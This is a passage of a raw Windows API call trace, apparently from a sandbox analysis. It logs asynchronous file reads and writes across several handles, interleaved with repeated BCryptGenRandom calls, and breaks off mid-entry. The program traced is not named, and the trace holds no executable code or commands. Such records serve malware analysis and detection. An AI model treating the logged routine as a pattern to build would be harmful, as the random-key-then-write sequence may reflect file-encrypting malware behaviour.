lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.564] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.572] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.595] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.596] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.596] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.597] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.597] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.597] free (_Block=0x3e305b8) [0162.597] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.597] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.597] free (_Block=0x1fa91d0) [0162.597] free (_Block=0x1fa2ed8) [0162.597] free (_Block=0x1fa90b8) [0162.597] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.609] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.623] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.635] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x70f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.641] CloseHandle (hObject=0x2a8) returned 1 [0162.641] free (_Block=0x3f70048) [0162.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.641] CloseHandle (hObject=0x3cc) returned 1 [0162.641] free (_Block=0x3e70008) [0162.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.731] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.731] free (_Block=0x3e305b8) [0162.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.731] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.731] free (_Block=0x1fa91d0) [0162.731] free (_Block=0x1fa2ed8) [0162.731] free (_Block=0x1fa90b8) [0162.731] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.732] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.750] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6bf6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.751] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.761] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.761] free (_Block=0x3e305b8) [0162.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.761] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.761] free (_Block=0x1fa91d0) [0162.761] free (_Block=0x1fa2ed8) [0162.761] free (_Block=0x1fa90b8) [0162.761] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.772] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.772] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.772] free (_Block=0x3e305b8) [0162.772] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.772] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.772] free (_Block=0x1fa91d0) [0162.772] free (_Block=0x1fa2ed8) [0162.772] free (_Block=0x1fa90b8) [0162.772] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.776] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.776] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.776] free (_Block=0x3e305b8) [0162.776] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.776] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.776] free (_Block=0x1fa91d0) [0162.776] free (_Block=0x1fa2ed8) [0162.776] free (_Block=0x1fa90b8) [0162.776] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.797] CloseHandle (hObject=0x2a8) returned 1 [0162.797] free (_Block=0x3d70450) [0162.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.809] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2b170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.831] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x2028, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.841] CloseHandle (hObject=0x3cc) returned 1 [0162.841] free (_Block=0x1ff1e60) [0162.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.853] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x28ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.853] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.865] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x349c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0162.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.868] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.054] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0163.054] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.065] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.079] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1138, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0163.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.106] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xdb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0163.106] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.121] CloseHandle (hObject=0x338) returned 1 [0163.122] free (_Block=0x3d70450) [0163.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.135] CloseHandle (hObject=0x3cc) returned 1 [0163.135] free (_Block=0x3df0008) [0163.135] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0163.714] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7c50, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.171] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.458] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0164.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0164.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0164.486] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.486] free (_Block=0x3e305b8) [0164.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.486] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.487] free (_Block=0x1fa91d0) [0164.487] free (_Block=0x1fa2ed8) [0164.487] free (_Block=0x1fa90b8) [0164.487] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0164.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.492] CloseHandle (hObject=0x308) returned 1 [0164.492] free (_Block=0x3d70450) [0164.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0164.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0164.504] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.504] free (_Block=0x3e305b8) [0164.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.504] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.504] free (_Block=0x1fa91d0) [0164.504] free (_Block=0x1fa2ed8) [0164.504] free (_Block=0x1fa90b8) [0164.504] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.509] CloseHandle (hObject=0x2a4) returned 1 [0164.511] free (_Block=0x3f70048) [0164.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0164.511] CloseHandle (hObject=0x170) returned 1 [0164.511] free (_Block=0x3df0008) [0164.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0165.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0165.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.068] BCryptGenRandom (in: hAlgorithm=0x0, 